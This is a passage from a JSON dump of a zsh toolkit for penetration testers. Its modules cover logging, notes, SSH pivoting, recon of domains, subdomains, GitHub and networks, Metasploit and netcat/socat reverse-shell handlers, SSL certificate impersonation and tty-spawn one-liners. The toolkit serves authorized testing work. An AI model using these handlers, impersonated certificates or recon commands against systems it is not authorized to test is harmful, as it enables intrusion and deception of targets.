    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-log\n#############################################################\n\nqq-log-help() {\n    cat << \"DOC\"\n\nqq-log\n-------------\nThe log namespace provides commands that create a logbook in\na directory specified by the __LOGBOOK variable. Use qq-log to append entries\nto the logbook. Display the log with qq-log-cat. Edit the log\nwith qq-log-edit.\n\nCommands\n--------\nqq-log-install:      installs dependencies\nqq-log:              alias ql, appends $@ to an entry in the logbook\nqq-log-cat:          alias qlc, cats the logbook\nqq-log-edit:         alias qle, edits the logbook using $EDITOR\nqq-log-set:          creates or uses existing logbook.md in the path specified\n\nDOC\n}\n\nqq-log-install() {\n    __info \"Running $0...\"\n    qq-install-golang\n    go get -u github.com/charmbracelet/glow\n}\n\nqq-log-set() {\n    qq-vars-set-logbook\n}\nalias qls=\"qq-log-set\"\n\nqq-log-cat() {\n    __check-logbook\n    __info \"${__LOGBOOK}\"\n    glow ${__LOGBOOK}\n}\nalias qlc=\"qq-log-cat\"\n\nqq-log-edit() {\n    __check-logbook\n    $EDITOR ${__LOGBOOK}\n}\nalias qle=\"qq-log-edit\"\n\nqq-log() {\n    __check-logbook\n\n    local stamp=$(date +'%m-%d-%Y : %r')\n    echo \"## ${stamp}\" >> ${__LOGBOOK}\n    echo \"\\`\\`\\`\" >> ${__LOGBOOK}\n    echo \"$@\" >> ${__LOGBOOK}\n    echo \"\\`\\`\\`\" >> ${__LOGBOOK}\n    echo \" \" >> ${__LOGBOOK}\n\n}\nalias ql=\"qq-log\""
  },
  {
    "path": "modules/qq-notes.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-notes\n#############################################################\n\nqq-notes-help() {\n    cat << \"DOC\"\n\nqq-notes\n-------\nThe notes namespace provides searching and reading of markdown notes that are\nstored in a directory specified by the __NOTES environment variable (qq-vars-global).\n\nCommands\n--------\nqq-notes-install:     installs dependencies\nqq-notes:             lists all notes in $__NOTES or searches notes by filename if $1 is supplied\nqq-notes-content:     list all notes in $__NOTES or searches notes by content if $1 is supplied\nqq-notes-menu:        display an interactive menu for reading notes\n\nDOC\n}\n\nqq-notes-install() {\n    __info \"Running $0...\"\n    __pkgs fzf ripgrep\n    qq-install-golang\n    go get -u github.com/charmbracelet/glow\n    qq-install-bat\n}\n\nqq-notes() {\n    __notes-check\n    __info \"Use \\$1 to search file names\"\n    select note in $(ls -R --file-type ${__NOTES} | grep -ie \".md$\" | grep -i \"$1\")\n    do test -n ${note} && break\n    exit\n    done\n    [[ ! -z ${note} ]] && glow ${__NOTES}/${note}\n}\n\nqq-notes-content() {\n    __notes-check\n    __info \"Use \\$1 to search content\"\n    select note in $(grep -rliw \"$1\" ${__NOTES}/*.md)\n    do test -n ${note} && break\n    exit\n    done\n    [[ ! -z ${note} ]] && glow ${note}\n}\n\nqq-notes-menu() {\n    __notes-check\n    pushd ${__NOTES} &> /dev/null\n    rg --no-heading --no-line-number --with-filename --color=always --sort path -m1 \"\" *.md | fzf --tac --no-sort -d ':' --ansi --preview-window wrap --preview 'bat --style=plain --color=always ${1}'\n    popd &> /dev/null\n}\n"
  },
  {
    "path": "modules/qq-pivot.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-pivot\n#############################################################\n\nqq-pivot-help() {\n    cat << \"DOC\"\n\nqq-pivot\n------------\nThe pivot namespace provides commands for using ssh to proxy and pivot.\n\nCommands\n--------\nqq-pivot-install:                      installs dependencies\nqq-pivot-mount-remote-sshfs:           mounts a remote directory to local /mnt path using sshfs\nqq-pivot-ssh-dynamic-proxy:            uses remote as a dynamic proxy\nqq-pivot-ssh-remote-to-local:          forwards remote port to local port\nqq-pivot-ssh-remote-to-local-burp:     forwards remote port 8080 to local port 8080\n\nDOC\n}\n\nqq-pivot-install() {\n    __info \"Running $0...\"\n    __pkgs sshfs rsync\n}\n\nqq-pivot-mount-remote-sshfs() { \n    __check-user\n    local lm && __askpath lm LMOUNT /mnt\n    local rm && __askvar rm RMOUNT /\n    qq-vars-set-rhost\n    mkdir -p ${lm}\n    print -z \"sshfs ${__USER}@${__RHOST}:${rm} ${lm}\" \n}\n\nqq-pivot-ssh-dynamic-proxy() {\n    __check-user\n    qq-vars-set-rhost\n    qq-vars-set-lport\n    print -z \"ssh -D ${__LPORT} -CqN ${__USER}@${__RHOST}\" \n}\n\nqq-pivot-ssh-remote-to-local() {\n    __check-user\n    qq-vars-set-rhost\n    qq-vars-set-rport\n    qq-vars-set-lport\n    print -z \"ssh -R ${__LPORT}:127.0.0.1:${__RPORT} ${__USER}@${__RHOST}\" \n}\n\nqq-pivot-ssh-remote-to-local-burp() {\n    __check-user\n    qq-vars-set-rhost\n    print -z \"ssh -R 8080:127.0.0.1:8080 ${__USER}@${__RHOST}\"\n}\n\n"
  },
  {
    "path": "modules/qq-project-custom.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-project-custom\n#############################################################\n\nqq-project-custom-help() {\n    cat << \"DOC\"\n\nqq-project-custom\n-----------------\nThe qq-project-custom namespace provides commands to set up custom project\ndirectory structures and variables for users that have specific requirements.\n\nVariables\n---------\n__PROJECT_ZD_CONSULTANT:     a global variable for consultant name used in ZD projects\n__PROJECT_ZD_ROOT:           a global variable for the project root folder used in ZD projects\n\nCommands\n--------\nqq-project-custom-zd-start:              scaffolds directory structure and logbook for \"zd\" projects\nqq-project-custom-zd-end:                zips and removes directories and data for \"zd\" projects\nqq-project-custom-zd-root-set:           sets the __PROJECT_ZD_ROOT variable\nqq-project-custom-zd-consultant-set:     sets the __PROJECT_ZD_CONSULTANT variable\n\nDOC\n}\n\nexport __PROJECT_ZD=\"\"\nexport __PROJECT_ZD_CONSULTANT=\"$(cat ${__GLOBALS}/__PROJECT_ZD_CONSULTANT 2> /dev/null)\"\nexport __PROJECT_ZD_ROOT=\"$(cat ${__GLOBALS}/__PROJECT_ZD_ROOT 2> /dev/null)\"\n\n# prompt for whichever ZD global is still unset\n__check-project-zd() {\n    if [[ -z $__PROJECT_ZD_CONSULTANT ]]\n    then\n        qq-project-custom-zd-consultant-set\n    fi\n    if [[ -z $__PROJECT_ZD_ROOT ]]\n    then\n        qq-project-custom-zd-root-set\n    fi\n}\n\n# the setters persist to the same file names the exports above read back\nqq-project-custom-zd-root-set() {\n    __warn \"Enter the full path to the root folder of your projects.\"\n    __prefill __PROJECT_ZD_ROOT DIR $HOME\n    echo \"${__PROJECT_ZD_ROOT}\" > ${__GLOBALS}/__PROJECT_ZD_ROOT\n}\n\nqq-project-custom-zd-consultant-set() {\n    __warn \"Enter consultant name below.\"\n    __askvar __PROJECT_ZD_CONSULTANT NAME \n    echo \"${__PROJECT_ZD_CONSULTANT}\" > ${__GLOBALS}/__PROJECT_ZD_CONSULTANT\n}\n\nqq-project-custom-zd-start() {\n\n    __check-project-zd\n\n    local pid && __askvar pid 
\"PROJECT ID\"\n    local pname && __askvar pname \"PROJECT NAME\"\n\n    local fname=\"${pid}-${pname}-${__PROJECT_ZD_CONSULTANT// /}\"\n    local fullpath=${__PROJECT_ZD_ROOT}/${fname}\n\n    #scaffold\n    mkdir -p ${fullpath}/{burp/{log,intruder,http-requests},client-supplied-info/emails,files/{downloads,uploads},notes/screenshots,scans/{raw,pretty},ssl,tool-output}\n    \n    #set project to be tool-output\n    __PROJECT=${fullpath}/tool-output\n\n    # wanted this to be an optional step, sometimes I'll create folders in advance due to calls with clients ahead of the test or prep work\n    local setlog && read \"setlog?$fg[cyan]Add a log file for this project (y/n)?:$reset_color \"\n    case \"$setlog\" in \n        y|Y ) \n            qq-log-set\n            ;;\n        n|N ) \n            echo \"no\"\n            ;;\n        * ) \n            echo \"\"\n            ;;\n    esac   \n}\n\nqq-project-custom-zd-end() {\n\n    __check-project-zd\n\n    __ask \"Select a project folder: \"\n    local pd=$(__menu $(find $__PROJECT_ZD_ROOT -mindepth 1 -maxdepth 1 -type d))\n    __ok \"Selected: ${pd}\"\n\n\n    # Task 1: delete all empty folders\n    local df && read \"df?$fg[cyan]Delete empty folders? 
(Y/n)?:$reset_color \"\n    if [[ \"$df\" =~ ^[Yy]$ ]]\n    then\n        find ${pd} -type d -empty -delete \n        __ok \"Empty folders deleted.\"\n    fi\n\n    # Task 2: create tree\n    cd ${pd}\n    tree -C -F -H ./ > ${pd}/tree.html \n    [[ -f \"${pd}/tree.html\" ]] && __ok \"Created ${pd}/tree.html.\" || __err \"Failed creating ${pd}/tree.html\"\n    cd - > /dev/null 2>&1\n\n    # Task 3: zip up engagement folder\n    local zf=$(basename ${pd})\n    7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=1024m -ms=on ${__PROJECT_ZD_ROOT}/${zf}.7z ${pd} > /dev/null 2>&1\n    [[ -f ${__PROJECT_ZD_ROOT}/${zf}.7z ]] && __ok \"Zipped files into ${__PROJECT_ZD_ROOT}/${zf}.7z.\" || __err \"Failed to zip ${pd}\"\n\n    # Task 4: Delete engagement folder\n    local rmp && read \"rmp?$fg[cyan]Delete project folder? (Y/n)?:$reset_color \"\n    [[ \"${rmp}\" =~ ^[Yy]$ ]] && print -z \"rm -rf ${pd}\"\n\n    __ok \"Project ended.\"\n}"
  },
  {
    "path": "modules/qq-project.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-project\n#############################################################\n\nqq-project-help() {\n    cat << \"DOC\"\n\nqq-project\n----------\nThe project namespace provides commands that help with setting\nup scope for an engagement or bug bounty, as well as commands for\nsyncing data and managing a VPS.\n\nCommands\n--------\nqq-project-install:                        installs dependencies\nqq-project-scope:                          generate a scope regex by root word (matches all to the left and right)\nqq-project-rescope-txt:                    uses rescope to generate scope from a url\nqq-project-rescope-burp:                   uses rescope to generate burp scope (JSON) from a url\nqq-project-sync-remote-to-local:           sync data from a remote server directory to a local directory using SSHFS\nqq-project-sync-local-file-to-remote:      sync a local file to a remote server using rsync over SSH\nqq-project-google-domain-dyn:              update IP address using Google domains hosted dynamic record\n\nDOC\n}\n\nqq-project-install() {\n    __info \"Running $0...\"\n    __pkgs fusermount sshfs rsync curl\n    qq-install-golang\n    go get -u github.com/root4loot/rescope\n}\n\nqq-project-scope() {\n    __check-project\n    __check-org\n    print -z \"echo \\\"^.*?${__ORG}\\..*\\$ \\\" >> ${__PROJECT}/scope.txt\"\n}\n\nqq-project-rescope-burp() {\n    __check-project\n    __ask \"Enter the URL to the bug bounty scope description\"\n    qq-vars-set-url\n    mkdir -p ${__PROJECT}/burp\n    print -z \"rescope --burp -u ${__URL} -o ${__PROJECT}/burp/scope.json\"\n}\n\nqq-project-sync-remote-to-local() {\n    __warn \"Enter your SSH connection username@remote_host\"\n    local ssh && __askvar ssh SSH\n    __warn \"Enter the full remote path to the directory you want to copy from\"\n    local rdir && __askvar rdir \"REMOTE DIR\"\n    __warn \"Enter the full local 
path to the directory to use as a mount point\"\n    local mnt && __askpath mnt \"LOCAL MOUNT\" /mnt\n    __warn \"Enter the full local path to the directory to sync the data to\"\n    local ldir && __askpath ldir \"LOCAL DIR\" $HOME\n\n    sudo mkdir -p $mnt\n\n    __ok \"Mounting $rdir to $mnt ...\"\n    sudo sshfs ${ssh}:${rdir} ${mnt}\n\n    __ok \"Syncing data from $mnt to $ldir ...\"\n    sudo rsync -avuc ${mnt} ${ldir}\n\n    __ok \"Unmounting $mnt. ...\"\n    sudo fusermount -u ${mnt}\n\n    __ok \"Sync Completed\"\n}\n\nqq-project-sync-local-file-to-remote() {\n    __warn \"Enter your SSH connection username@remote_host\"\n    local ssh && __askvar ssh SSH\n    __warn \"Enter the full local path to the file you want to copy to your remote server\"\n    local lfile && __askpath lfile \"LOCAL FILE\" $HOME\n    __warn \"Enter the full remote path to the directory you want to copy the file to\"\n    local rdir && __askvar rdir \"REMOTE DIR\"\n    # StrictHostKeyChecking=no with UserKnownHostsFile=/dev/null skips SSH host key verification for this transfer\n    print -z \"rsync -avz -e \\\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\\\" --progress $lfile $ssh:$rdir\"\n}\n\nqq-project-google-domain-dyn() {\n    local u && __askvar u USERNAME\n    local p && __askvar p PASSWORD\n    local d && __askvar d DOMAIN\n    qq-vars-set-lhost \n    # -A sets the user agent; the URL is quoted so zsh does not glob the ? or background at the &\n    print -z \"curl -s -A \\\"${__UA}\\\" \\\"https://$u:$p@domains.google.com/nic/update?hostname=${d}&myip=${__LHOST}\\\"\"\n}\n"
  },
  {
    "path": "modules/qq-recon-domains.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-domains\n#############################################################\n\nqq-recon-domains-help() {\n    cat << \"DOC\"\n\nqq-recon-domains\n-------------\nThe recon-domains namespace provides commands to recon horizontal domains of a root domain.\nAll domains stored in $__PROJECT/domains/domains.txt and $__PROJECT/amass.\nYou can sort unique this file in place with the \"sfu\" alias.\n\nCommands\n--------\nqq-recon-domains-install:          installs dependencies\nqq-recon-domains-amass-whois:      find domains with whois\nqq-recon-domains-amass-asn:        find domains by asn\n\nDOC\n}\n\nqq-recon-domains-install() {\n    __info \"Running $0...\"\n    __pkgs amass \n}\n\nqq-recon-domains-amass-whois() {\n    __check-project\n    qq-vars-set-domain\n    mkdir -p ${__PROJECT}/amass\n    mkdir -p ${__PROJECT}/domains\n    print -z \"amass intel -active -whois -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt\"\n}\n\nqq-recon-domains-amass-asn() {\n    __check-project\n    __check-asn\n    mkdir -p ${__PROJECT}/amass\n    mkdir -p ${__PROJECT}/domains\n    print -z \"amass intel -active -asn ${__ASN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt\"\n}\n"
  },
  {
    "path": "modules/qq-recon-github.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-github\n#############################################################\n\nqq-recon-github-help() {\n    cat << \"DOC\"\n\nqq-recon-github\n------------\nThe recon-github namespace provides commands for the recon of github repos.\nAll output will be stored under $__PROJECT/source\n\nCommands\n--------\nqq-recon-github-install:        installs dependencies\nqq-recon-github-user-repos:     uses curl to get a list of repos for a github user\nqq-recon-github-endpoints:      gets a list of urls from all repos of a domain on github\nqq-recon-github-gitrob:         clones (in mem) repos and searches for github dorks\nqq-recon-github-api-set:        set github API key global variable\n\nDOC\n}\n\nqq-recon-github-install() {\n    __info \"Running $0...\"\n    __pkgs curl jq python3 \n    qq-install-golang\n    qq-install-github-search\n    qq-install-git-secrets\n    qq-install-gitrob\n}\n\nqq-recon-github-user-repos() {\n    __check-project\n    __check-user\n    mkdir -p ${__PROJECT}/source\n    print -z \"curl -s \\\"https://api.github.com/users/${__USER}/repos?per_page=1000\\\" | jq '.[].git_url' | tee -a ${__PROJECT}/source/${__USER}.txt \"\n}\n\nqq-recon-github-endpoints() {\n    __check-api-github\n    __check-project\n    qq-vars-set-domain\n    mkdir -p ${__PROJECT}/source\n    print -z \"github-endpoints.py -t ${__API_GITHUB} -d ${__DOMAIN} | tee -a ${__PROJECT}/source/${__DOMAIN}.endpoints.txt \"\n}\n\nqq-recon-github-gitrob() {\n    __check-api-github\n    __check-project\n    __check-user\n    local d=${__PROJECT}/source/${__USER}\n    mkdir -p $d\n    cp $HOME/go/src/github.com/codeEmitter/gitrob/filesignatures.json $d\n    __info \"Gitrob UI: http://127.0.0.1:9393/\"\n    print -z \"pushd $d ;gitrob -in-mem-clone -save \\\"$d/output.json\\\" -github-access-token $__API_GITHUB ${__USER} && popd\"\n}\n"
  },
  {
    "path": "modules/qq-recon-networks.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-networks\n#############################################################\n\nqq-recon-networks-help() {\n    cat << \"DOC\"\n\nqq-recon-networks\n-------------\nThe recon-networks namespace provides commands to recon ASNs and IP networks for an organization.\nAll network data is stored in $__PROJECT/networks.\n\nCommands\n--------\nqq-recon-networks-install:          installs dependencies\nqq-recon-networks-amass-asns:       find asns by org\nqq-recon-networks-bgp:              use the bgp.he.net website to find asns and networks\nqq-recon-networks-bgpview-ipv4:     curl api.bgpview.io for ipv4 networks by asn\nqq-recon-networks-bgpview-ipv6:     curl api.bgpview.io for ipv6 networks by asn\n\nDOC\n}\n\nqq-recon-networks-install() {\n    __info \"Running $0...\"\n    __pkgs curl jq amass\n}\n\nqq-recon-networks-bgp() {\n    __info \"Search https://bgp.he.net/\"\n}\n\nqq-recon-networks-amass-asns() {\n    __check-project\n    __check-org\n    mkdir -p ${__PROJECT}/networks\n    print -z \"amass intel -org ${__ORG} | cut -d, -f1 | tee -a ${__PROJECT}/networks/asns.txt \"\n}\n\nqq-recon-networks-bgpview-ipv4() {\n    __check-project\n    __check-asn\n    mkdir -p ${__PROJECT}/networks\n    print -z \"curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv4.txt\"\n}\n\nqq-recon-networks-bgpview-ipv6() {\n    __check-project\n    __check-asn\n    mkdir -p ${__PROJECT}/networks\n    print -z \"curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv6_prefixes | .[].prefix'  | tee -a ${__PROJECT}/networks/ipv6.txt\"\n}\n\n"
  },
  {
    "path": "modules/qq-recon-org.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-org\n#############################################################\n\nqq-recon-org-help() {\n    cat << \"DOC\"\n\nqq-recon-org\n------------\nThe recon namespace provides commands for the recon of an organization.\nData from commands will be stored in $__PROJECT/recon.\n\nCommands\n--------\nqq-recon-org-install:               installs dependencies\nqq-recon-org-files-metagoofil:      uses metagoofil to search and download files for a domain\nqq-recon-org-wordlist-cewl:         uses cewl to create a custom wordlist from a url\nqq-recon-org-theharvester:          uses theHarvester to mine data about a target domain\n\nDOC\n}\n\nqq-recon-org-install() {\n    __info \"Running $0...\"\n    __pkgs whois metagoofil cewl theharvester\n}\n\nqq-recon-org-files-metagoofil() {\n    __check-project\n    __check-ext-docs\n    qq-vars-set-domain\n    mkdir -p ${__PROJECT}/recon/files\n    print -z \"metagoofil -u \\\"${__UA}\\\" -d ${__DOMAIN} -t ${__EXT_DOCS} -o ${__PROJECT}/recon/files\"\n}\n\nqq-recon-org-files-urls() {\n    __check-project\n    qq-vars-set-domain\n    print -z \"strings * | gf urls | grep $__DOMAIN | tee -a ${__PROJECT}/recon/urls.txt\"\n}\n\nqq-recon-org-wordlist-by-url-cewl() {\n    __check-project\n    qq-vars-set-url\n    mkdir -p ${__PROJECT}/recon\n    print -z \"cewl -a -d 3 -m 5 -u \\\"${__UA}\\\" -w ${__PROJECT}/recon/cewl.txt ${__URL}\"\n}\n\nqq-recon-org-theharvester() {\n    __check-project\n    qq-vars-set-domain\n    mkdir -p ${__PROJECT}/recon\n    print -z \"theHarvester -d ${__DOMAIN} -l 50 -b all -f ${__PROJECT}/recon/harvested.txt\"\n}\n\nqq-recon-org-cse() {\n    __info \"Use https://cse.google.com/cse/all to create a custom search engine\"\n}"
  },
  {
    "path": "modules/qq-recon-subs.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-subs\n#############################################################\n\nqq-recon-subs-help() {\n    cat << \"DOC\"\n\nqq-recon-subs\n-------------\nThe recon namespace provides commands to recon vertical sub-domains of a root domain.\nAll subdomains for a domain will be stored in $__PROJECT/amass and $__PROJECT/domains/$DOMAIN/subs.txt.\nYou can sort unique this file in place with the \"sfu\" alias.\n\nCommands\n--------\nqq-recon-subs-install: installs dependencies\n\nCommands - enumeration\n----------------------\nqq-recon-subs-amass-enum:       enumerate subdomains into amass db (api keys help)\nqq-recon-subs-amass-diff:       track changes between last 2 enumerations using amass db\nqq-recon-subs-amass-names:      list gathered subs in the amass db\nqq-recon-subs-crt.sh:           gather subdomains from crt.sh\nqq-recon-subs-subfinder:        gather subdomains from sources (api keys help)\nqq-recon-subs-assetfinder:      gather subdomains from sources (api keys help)\nqq-recon-subs-wayback:          gather subdomains from Wayback Machine\n\nCommands - brute force\n----------------------\nqq-recon-subs-brute-massdns:    try to resolve a list of subdomains generated for brute forcing\nqq-recon-subs-gen-wordlist:     generate a wordlist of possible sub domains \n\nCommands - processing\n---------------------\nqq-recon-subs-resolve-massdns:   resolve a file of subdomains using massdns\nqq-recon-subs-resolve-parse:     parse resolved.txt into A, CNAME and IP's\n\nDOC\n}\n\nqq-recon-subs-install() {\n    __info \"Running $0...\"\n    __pkgs gobuster amass curl wordlists seclists dnsrecon dnsutils\n\n    qq-install-golang\n    go get -u github.com/projectdiscovery/subfinder/cmd/subfinder\n    go get -u github.com/tomnomnom/assetfinder\n    go get -u github.com/tomnomnom/waybackurls\n\n    qq-install-massdns\n}\n\nqq-recon-subs-amass-enum() {\n    
__check-project\n    qq-vars-set-domain\n    mkdir -p ${__PROJECT}/amass\n    print -z \"amass enum -active -ip -d ${__DOMAIN} -dir ${__PROJECT}/amass\"\n}\n\nqq-recon-subs-amass-diff() {\n    __check-project\n    qq-vars-set-domain\n    mkdir -p ${__PROJECT}/amass\n    print -z \"amass track -d ${__DOMAIN} -last 2 -dir ${__PROJECT}/amass\"\n}\n\nqq-recon-subs-amass-names() {\n    __check-project\n    qq-vars-set-domain\n    mkdir -p ${__PROJECT}/amass\n    print -z \"amass db -names -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-crt.sh() {\n    __check-project\n    qq-vars-set-domain\n    print -z \"curl -s 'https://crt.sh/?q=%.${__DOMAIN}' | grep -i \\\"${__DOMAIN}\\\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \\\" \\\" | sort -u | tee -a  $(__dompath)/subs.txt \"\n}\n\nqq-recon-subs-subfinder() {\n    __check-project\n    qq-vars-set-domain\n    __check-threads\n    print -z \"subfinder -t ${__THREADS} -d ${__DOMAIN} -nW -silent | tee -a $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-assetfinder() {\n    __check-project\n    qq-vars-set-domain\n    print -z \"echo ${__DOMAIN} | assetfinder --subs-only | tee -a $(__dompath)/subs.txt\" \n}\n\nqq-recon-subs-wayback() {\n    __check-project\n    qq-vars-set-domain \n    print -z \"echo ${__DOMAIN} | waybackurls | cut -d \"/\" -f3 | sort -u | grep -v \\\":80\\\" | tee -a $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-resolve-massdns() {\n    __check-project\n    __check-resolvers\n    qq-vars-set-domain\n    print -z \"massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w  $(__dompath)/resolved.txt $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-brute-massdns() {\n    __check-project\n    __check-resolvers\n    qq-vars-set-domain\n    __ask \"Select the file containing a custom wordlist for ${__DOMAIN} (qq-recon-subs-gen-wordlist)\"\n    local f && __askpath f FILE $(__dompath)\n    print -z \"massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w  $(__dompath)/resolved-brute.txt 
$f\"\n}\n\nqq-recon-subs-resolve-parse() {\n    __check-project\n    qq-vars-set-domain\n    __info \"Generating files resolved-*.txt\"\n    grep -ie \"CNAME\" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-CNAME.txt\n    grep -v \"CNAME\" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-A.txt\n    grep -v \"CNAME\" $(__dompath)/resolved.txt | sort -u | cut -d' ' -f3 | sort -u > $(__dompath)/resolved-IP.txt\n}\n\nqq-recon-subs-gen-wordlist() {\n    __check-project\n    qq-vars-set-domain\n    local f && __askpath f FILE /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n    print -z \"for s in \\$(cat ${f}); do echo \\$s.${__DOMAIN} >> $(__dompath)/subs.wordlist.txt; done\"\n}\n"
  },
  {
    "path": "modules/qq-scripts.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-scripts\n#############################################################\n\n# qq-scripts-help() {\n#   cat << \"DOC\"\n\n# qq-scripts\n# -------\n# The scripts namespace runs scripts from the quiver\n# scripts directory.\n\n# ** IN DEVELOPMENT, NOT READY FOR USE **\n\n# Commands\n# --------\n# qq-scripts-recon: a zsh recon script\n# qq-scripts-webrecon: a zsh webrecon script\n\n# DOC\n# }\n\n# qq-scripts-recon() {\n#   local d && read \"d?$(__cyan DOMAIN: )\"\n#   local o && read \"o?$(__cyan ORG: )\"\n#   local w && read \"out?$(__cyan WORKING\\(DIR\\): )\"\n#   print -z \"zsh ${__SCRIPTS}/recon.zsh ${d} \\\"${o}\\\" \\\"${w}\\\"\"\n# }\n\n# qq-scripts-webrecon() {\n#   local f=$(rlwrap -S \"$(__cyan FILE:\\(DOMAINS\\))\" -e '' -c -o cat)\n#   local w && read \"out?$(__cyan WORKING\\(DIR\\): )\"\n#   pushd ${w}\n#   print -z \"zsh ${__SCRIPTS}/webrecon.zsh ${f}\"\n#   popd\n# }\n\n\n"
  },
  {
    "path": "modules/qq-shell-handlers-msf.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-handlers-msf\n#############################################################\n\nqq-shell-handlers-msf-help() {\n    cat << \"DOC\"\n\nqq-shell-handlers-msf\n---------------------\nThe shell-handlers-msf namespace provides commands for spawning \nreverse shell connections using metasploit.\n\nCommands\n--------\nqq-shell-handlers-msf-install:            installs dependencies\nqq-shell-handlers-msf-ssl-gen:            impersonate a real SSL certificate for use in reverse shells\nqq-shell-handlers-msf-w64-multi-https:    multi-handler for staged windows/x64/meterpreter/reverse_https payload\n\nDOC\n}\n\nqq-shell-handlers-install-msf() {\n    __info \"Running $0...\"\n    __pkgs metasploit-framework\n}\n\nqq-shell-handlers-msf-ssl-gen() {\n    __ask \"Enter the hostname of the site to impersonate\"\n    local r && __prefill r SITE aka.ms\n    local cmd=\"use auxiliary/gather/impersonate_ssl; set RHOST ${r}; run; exit \"\n    __info \"Use qq-vars-global-set-ssl-shell-cert to the path of the .pem file\"\n    print -z \"msfconsole -n -q -x \\\"${cmd}\\\" \"\n}\n\nqq-shell-handlers-msf-w64-https() {\n    qq-vars-set-lhost\n    qq-vars-set-lport\n    __msf << VAR\nuse exploit/multi/handler;\nset PAYLOAD windows/x64/meterpreter/reverse_https;\nset LHOST ${__LHOST};\nset LPORT ${__LPORT};\nset HANDLERSSLCERT ${__SHELL_SSL_CERT};\nset EXITONSESSION false\nrun;\nexit\nVAR\n\n}\n"
  },
  {
    "path": "modules/qq-shell-handlers.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-handlers\n#############################################################\n\nqq-shell-handlers-help() {\n    cat << \"DOC\"\n\nqq-shell-handlers\n-----------------\nThe shell-handlers namespace provides commands for spawning reverse shell\nconnections.\n\nCommands\n--------\nqq-shell-handlers-install:        installs dependencies\nqq-shell-handlers-msf-ssl-gen:    impersonate a real SSL certificate for use in reverse shells\nqq-shell-handlers-nc:             \nqq-shell-handlers-ncrl:           \nqq-shell-handlers-nc-udp:\nqq-shell-handlers-socat:\n\nDOC\n}\n\nqq-shell-handlers-install() {\n    __info \"Running $0...\"\n    __pkgs netcat socat\n}\n\n# netcat\n\nqq-shell-handlers-nc() {\n    qq-vars-set-lport\n    print -z \"nc -nlvp ${__LPORT}\"\n}\n\nqq-shell-handlers-ncrl() {\n    qq-vars-set-lport\n    print -z \"rlwrap nc -nlvp ${__LPORT}\"\n}\n\nqq-shell-handlers-nc-udp() {\n    qq-vars-set-lport\n    print -z \"nc -nlvu ${__LPORT}\"\n}\n\n# socat\n\nqq-shell-handlers-socat() {\n    qq-vars-set-lport\n    print -z \"socat file:`tty`,raw,echo=0 tcp-listen:${__LPORT}\"\n}\n"
  },
  {
    "path": "modules/qq-shell-tty.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-tty\n#############################################################\n\nqq-shell-tty-help() {\n    cat << \"DOC\"\n\nqq-shell-tty\n------------\nThe shell-tty namespace provides commands for fixing interactive \ncommand/reverse shells.\n\nCommands\n--------\nqq-shell-tty-python2:     command to spawn a tty shell\nqq-shell-tty-python3:     command to spawn a tty shell     \nqq-shell-tty-perl:        command to spawn a tty shell\nqq-shell-tty-ruby:        command to spawn a tty shell\nqq-shell-tty-lua:         command to spawn a tty shell\nqq-shell-tty-expect:      command to spawn a tty shell\n\nDOC\n}\n\nqq-shell-tty-python2() {\n    __ok \"Copy the commands below and use on the remote system\"\n    cat << \"DOC\" \n\npython -c 'import pty;pty.spawn(\"/bin/sh\")' \n\nDOC\n}\n\nqq-shell-tty-python3() {\n    __ok \"Copy the commands below and use on the remote system\"\n    cat << \"DOC\" \n\npython3 -c 'import pty;pty.spawn(\"/bin/sh\")'\n\nDOC\n}\n\nqq-shell-tty-perl() {\n    __ok \"Copy the commands below and use on the remote system\"\n    cat << \"DOC\" \n\nperl -e 'exec \"/bin/sh\";'\n\nDOC\n}\n\nqq-shell-tty-ruby() {\n    __ok \"Copy the commands below and use on the remote system\"\n    cat << \"DOC\" \n\nruby: exec \"/bin/sh\"\n\nDOC\n}\n\nqq-shell-tty-lua() {\n    __ok \"Copy the commands below and use on the remote system\"\n    cat << \"DOC\" \n\nlua: os.execute('/bin/sh')\n\nDOC\n}\n\nqq-shell-tty-expect() {\n    __ok \"Copy the commands below and use on the remote system\"\n    cat << \"DOC\" \n\n/usr/bin/expect sh\n\nDOC\n}\n"
  },
  {
    "path": "modules/qq-srv.zsh",
